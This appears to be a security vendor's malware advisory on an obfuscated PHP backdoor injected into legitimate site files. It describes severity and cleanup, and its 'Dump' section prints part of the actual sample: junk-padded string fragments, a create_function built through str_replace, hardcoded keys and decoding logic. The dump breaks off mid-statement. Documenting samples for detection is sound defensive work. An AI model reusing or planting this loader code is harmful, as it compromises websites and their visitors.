PRICING SUPPORT LOGIN

Rearranged, and lightly obfuscated this malware is used to create malicious PHP functions inside legit PHP files. It creates a function which is gzuncompress-ed and base64 encoded. It is injected inside all kind of functional PHP files and then it can be used for injecting SPAM-SEO, unwanted ads and even more harmful code such as backdoors and loading client side browser exploits.

Severity

HIGH

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

$d='ss(md5($i.$kh),eY0eY,3));$f=$sl($ss(eYmd5eY($i.$kf),0,3)eY);$p=eY"";for(eY$zeY=1;eY$z<count($meY[1])';
$l=str_replace('Z','','creZaZtZe_fuZncZtiZon');
$i='ay(eY"/","eY+"),$ss($eYs[$i],0eY,$e)))eY,$k)eY));$o=oeYb_get_ceYeYontentseY()eY;ob_end_cleaeYn();eY$d';
$B=';$zeYeY+eY+)$p.=$q[$m[2][$zeY]]eY;ieYf(strpeYos($p,$h)===0eY){$s[$i]eY="";eY$p=$seYs($p,3eYeY);}if(arraeYy_k';
$G='$kh=eYeY"c8beY2";$kf=eY"2412";functeYion x($t,eY$eYk){$c=strlen($eYk)eY;$l=strlen(eYeY$teY)eY;$o="";foreY(';
$x='eeYy_exists(eY$i,$s)){eY$eYs[$i]eY.=$peY;$e=eYstrpos($s[$i]eY,$f);if($eYe)